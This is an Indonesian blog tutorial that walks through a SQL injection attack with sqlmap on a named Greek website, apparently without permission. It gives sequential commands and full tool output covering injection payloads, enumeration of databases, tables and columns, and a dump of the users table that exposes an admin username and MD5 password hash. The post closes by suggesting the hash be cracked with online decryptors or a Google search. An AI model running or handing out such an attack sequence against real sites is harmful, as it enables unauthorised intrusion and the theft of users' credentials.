NB = SQLMAP adalah tools hacking yang berjalan di OS LINUX.
NB = aku anggap kamu sudah install TOOLS SQLMAP ini di OS LINUX mu.
KETERANGAN PERINTAH =
--dbs : untuk mengetahui ada berapa DATABASE di website tersebut
--tables : untuk mengetahui ada table apa saja di website tersebut
--columns : untuk mengetahui ada berapa column dari table yang kita pilih
--level 5 : untuk meningkatkan tingkat scanning kita hingga ke level 5 dari website yang kita scan
--random-agent : untuk (maaf saya belum tahu)
-D , -T ,-C : Database, Table, Column Target = http://www.barracuda.gr
1. Buka TERMINAL mu dan pindah ke directory dimana SQL MAP mu kamu simpan.
NB = saya mendowload ulang dan menyimpan FOLDER SQLMAP di Desktop LINUX BACKTRACK saya.
setelah masuk ke directory / folder penyimpanan tools SQLMAP, ketikkan perintah ini di TERMINAL mu :
=> ./sqlmap.py -u http://www.barracuda.gr/newsone.php?id=50 --random-agent --dbs
kalau saya seperti ini hasil lengkap dari syntaxnya =
root@bt:~/Desktop/HACK/sqlmap# ./sqlmap.py -u http://www.barracuda.gr/newsone.php?id=50 --random-agent --dbs
hasilnya
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:43:09
[22:43:09] [INFO] fetched random HTTP User-Agent header from file '/root/Desktop/HACK/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 5.1; uk; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
[22:43:12] [INFO] testing connection to the target url
[22:43:15] [INFO] testing if the url is stable, wait a few seconds
[22:43:24] [INFO] url is stable
[22:43:24] [INFO] testing if GET parameter 'id' is dynamic
[22:43:26] [INFO] confirming that GET parameter 'id' is dynamic
[22:43:27] [INFO] GET parameter 'id' is dynamic
[22:43:28] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[22:43:28] [INFO] testing for SQL injection on GET parameter 'id'
[22:43:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:43:37] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[22:43:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[22:43:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:43:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[22:45:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[22:45:31] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[22:45:36] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[22:45:48] [INFO] target url appears to have 8 columns in query
[22:45:57] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Y
sqlmap identified the following injection points with a total of 21 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=50 AND 2597=2597
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: id=50 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6364683a,0x54647175584c58446754,0x3a62796f3a), NULL, NULL, NULL, NULL, NULL, NULL#
---
[22:46:36] [INFO] testing MySQL
[22:46:40] [INFO] confirming MySQL
[22:46:43] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.22
back-end DBMS: MySQL >= 5.0.0
[22:46:43] [INFO] fetching database names
[22:46:44] [INFO] the SQL query used returns 2 entries
[22:46:48] [INFO] retrieved: "information_schema"
[22:46:49] [INFO] retrieved: "barrak_db"
available databases [2]:
[*] barrak_db
[*] information_schema
[22:46:49] [INFO] fetched data logged to text files under '/root/Desktop/HACK/sqlmap/output/www.barracuda.gr'
[*] shutting down at 22:46:49
2. Kita sudah tahu DATABASE nya dari web site tersebut. Ada 2 macam yaitu Barrack_db dan Information_schema .
sekarang ketikkan perintah berikut untuk mengetahui table-tablenya :
=> ./sqlmap.py -u http://www.barracuda.gr/newsone.php?id=50 --random-agent -D barrak_db --tables
hasilnya
sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:49:05
[22:49:05] [INFO] fetched random HTTP User-Agent header from file '/root/Desktop/HACK/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.427.0 Safari/534.1
[22:49:05] [INFO] resuming back-end DBMS 'mysql'
[22:49:07] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=50 AND 2597=2597
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: id=50 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6364683a,0x54647175584c58446754,0x3a62796f3a), NULL, NULL, NULL, NULL, NULL, NULL#
---
[22:49:11] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[22:49:11] [INFO] fetching tables for database: 'barrak_db'
[22:49:13] [INFO] the SQL query used returns 7 entries
[22:49:14] [INFO] retrieved: "article"
[22:49:16] [INFO] retrieved: "newsletter"
[22:49:17] [INFO] retrieved:"offers"
[22:49:18] [INFO] retrieved: "photos_tbl"
[22:49:20] [INFO] retrieved: "products_tbl"
[22:49:21] [INFO] retrieved: "tbl_category"
[22:49:23] [INFO] retrieved: "users"
Database: barrak_db
[7 tables]
+--------------+
| article |
| newsletter |
| offers |
| photos_tbl |
| products_tbl |
| tbl_category |
| users |
+--------------+
[22:51:40] [INFO] fetched data logged to text files under '/root/Desktop/HACK/sqlmap/output/www.barracuda.gr'
[*] shutting down at 22:51:40
3. Kita sudah dapat table-table apa saja yang ada di dalam DATABASE tersebut beserta.
Saya tertarik dengan TABLE USER, mungkin berisi NAMA-NAMA USER termasuk ADMIN yang dipergunakan untuk LOGIN didalam webpage login.
Selanjutnya ketikkan perintah berikut untuk mengetahui COLUMN apa saja yang ada di dalam tabel USER :
./sqlmap.py -u http://www.barracuda.gr/newsone.php?id=50 --random-agent -D barrak_db -T users --columns
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:18:10
[23:18:10] [INFO] fetched random HTTP User-Agent header from file '/root/Desktop/HACK/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.0 Chrome/10.0.648.0 Safari/534.16
[23:18:10] [INFO] resuming back-end DBMS 'mysql'
[23:18:10] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=50 AND 2597=2597
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: id=50 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6364683a,0x54647175584c58446754,0x3a62796f3a), NULL, NULL, NULL, NULL, NULL, NULL#
---
[23:18:15] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[23:18:15] [INFO] fetching columns for table 'users' in database 'barrak_db'
[23:18:15] [INFO] the SQL query used returns 18 entries
[23:18:15] [INFO] resumed: "userid","int(5)"
[23:18:15] [INFO] resumed: "firstname","varchar(30)"
[23:18:15] [INFO] resumed: "lastname","varchar(30)"
[23:18:15] [INFO] resumed: "username","varchar(20)"
[23:18:15] [INFO] resumed: "password","varchar(100)"
[23:18:15] [INFO] resumed: "useraddress","varchar(50)"
[23:18:15] [INFO] resumed: "postalcode","int(8)"
[23:18:15] [INFO] resumed: "perioxi","varchar(30)"
[23:18:15] [INFO] resumed: "poli","varchar(30)"
[23:18:15] [INFO] resumed: "phone","int(10)"
[23:18:15] [INFO] resumed: "usermail","varchar(30)"
[23:18:15] [INFO] resumed: "confirm_hash","varchar(40)"
[23:18:15] [INFO] resumed: "is_confirmed","int(3)"
[23:18:15] [INFO] resumed: "userip","varchar(15)"
[23:18:15] [INFO] resumed: "date_created","date"
[23:18:15] [INFO] resumed: "islogged","int(3)"
[23:18:15] [INFO] resumed: "last_logging","date"
[23:18:15] [INFO] resumed: "user_level","int(3)"
Database: barrak_db
Table: users
[18 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| confirm_hash | varchar(40) |
| date_created | date |
| firstname | varchar(30) |
| is_confirmed | int(3) |
| islogged | int(3) |
| last_logging | date |
| lastname | varchar(30) |
| password | varchar(100)|
| perioxi | varchar(30) |
| phone | int(10) |
| poli | varchar(30) |
| postalcode | int(8) |
| user_level | int(3) |
| useraddress | varchar(50) |
| userid | int(5) |
| userip | varchar(15) |
| usermail | varchar(30) |
| username | varchar(20) |
+--------------+--------------+
[23:18:15] [INFO] fetched data logged to text files under '/root/Desktop/HACK/sqlmap/output/www.barracuda.gr'
[*] shutting down at 23:18:15
4. Sesuai Dugaan, Tidak hanya terdapat Column USERNAME, melainkan terdapat Column PASSWORD juga.
mari kita DUMP #devils mode = on
ketikkan perintah berikut :
=> ./sqlmap.py -u http://www.barracuda.gr/newsone.php?id=50 --random-agent -D barrak_db -T users -C password,username,usermail,userid,userip,user_level --dump
hasilnya
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:21:13
[23:21:13] [INFO] fetched random HTTP User-Agent header from file '/root/Desktop/HACK/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
[23:21:13] [INFO] resuming back-end DBMS 'mysql'
[23:21:13] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=50 AND 2597=2597
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: id=50 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6364683a,0x54647175584c58446754,0x3a62796f3a), NULL, NULL, NULL, NULL, NULL, NULL#
---
[23:21:18] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[23:21:18] [INFO] fetching entries of column(s) 'password, user_level, userid, userip, usermail, username' for table 'users' in database 'barrak_db'
[23:21:18] [INFO] the SQL query used returns 1 entries
[23:21:19] [INFO] retrieved: "a65d487491bd8078e3fc7c83db598cbe","3","15","","","barrak"
[23:21:19] [INFO] analyzing table dump for possible password hashes recognized possible password hashes in column 'password'. Do you want to crack them via a dictionary-based attack? [y/N/q] Y
[23:21:22] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/root/Desktop/HACK/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[23:21:24] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] Y
[23:21:26] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[23:21:26] [INFO] starting 4 processes
[23:21:45] [INFO] using suffix '1'
[23:22:03] [INFO] using suffix '123'
[23:22:22] [INFO] using suffix '2'
[23:22:41] [INFO] using suffix '12'
[23:22:59] [INFO] using suffix '3'
[23:23:17] [INFO] using suffix '13'
[23:23:37] [INFO] using suffix '7'
[23:23:56] [INFO] using suffix '11'
[23:24:14] [INFO] using suffix '5'
[23:24:34] [INFO] using suffix '22'
[23:24:53] [INFO] using suffix '23'
[23:25:13] [INFO] using suffix '01'
[23:25:32] [INFO] using suffix '4'
[23:25:50] [INFO] using suffix '07'
[23:26:11] [INFO] using suffix '21'
[23:26:30] [INFO] using suffix '14'
[23:26:49] [INFO] using suffix '10'
[23:27:10] [INFO] using suffix '06'
[23:27:29] [INFO] using suffix '08'
[23:27:50] [INFO] using suffix '8'
[23:28:09] [INFO] using suffix '15'
[23:28:30] [INFO] using suffix '69'
[23:28:49] [INFO] using suffix '16'
[23:29:07] [INFO] using suffix '6'
[23:29:25] [INFO] using suffix '18'
[23:29:43] [INFO] using suffix '!'
[23:30:02] [INFO] using suffix '.'
[23:30:21] [INFO] using suffix '*'
[23:30:41] [INFO] using suffix '!!'
[23:31:01] [INFO] using suffix '?'
[23:31:20] [INFO] using suffix ';'
[23:31:39] [INFO] using suffix '..'
[23:31:58] [INFO] using suffix '!!!'
[23:32:16] [INFO] using suffix ','
[23:32:36] [INFO] using suffix '@'
[23:32:55] [INFO] writing uncracked hashes to file '/tmp/tmps5Ogjj.txt' for eventual further processing
[23:32:55] [WARNING] no clear password(s) found
[23:32:55] [INFO] postprocessing table dump
Database: barrak_db
Table: users
[1 entry]
+--------+---------+----------+----------+---------------------------------------------------+----------------+
| userid | userip | username | usermail | password | user_level |
+--------+---------+----------+----------+---------------------------------------------------+----------------+
| 15 | <blank> | barrak | <blank> | a65d487491bd8078e3fc7c83db598cbe | 3 |
+--------+---------+----------+----------+---------------------------------------------------+-----------------+
[23:32:55] [INFO] table 'barrak_db.users' dumped to CSV file '/root/Desktop/HACK/sqlmap/output/www.barracuda.gr/dump/barrak_db/users.csv'
[23:32:55] [INFO] fetched data logged to text files under '/root/Desktop/HACK/sqlmap/output/www.barracuda.gr'
[*] shutting down at 23:32:55
DAMN....!!!!
PASSWORD nya bukan PASSWORD TELANJANG.
jadi kita harus DECRYPT dulu password tersebut.
HITUNG jumlah PASSWORD HASH nya (ada 32 panjang bit), berarti kemungkinan menggunakan ENCRYPTION MD5.
mari kita coba decrypt menggunakan MD5 DECRYPTOR ONLINE.
atau alternatif lain kita menggunakan " WWW.GOOGLE.COM "
ketikkan HASH PASSWORD tersebut pada GOOGLE
dan beginilah hasilnya
kita juga dapat membuktikan melalui LINK PASTEBIN
Kali ini SAYA BELUM BERUNTUNG + Belum punya waktu untuk men-DECRYPT password tersebut.
Semoga ada waktu buat maen-maen dengan PASSWORD ini.
(:
0 komentar:
Posting Komentar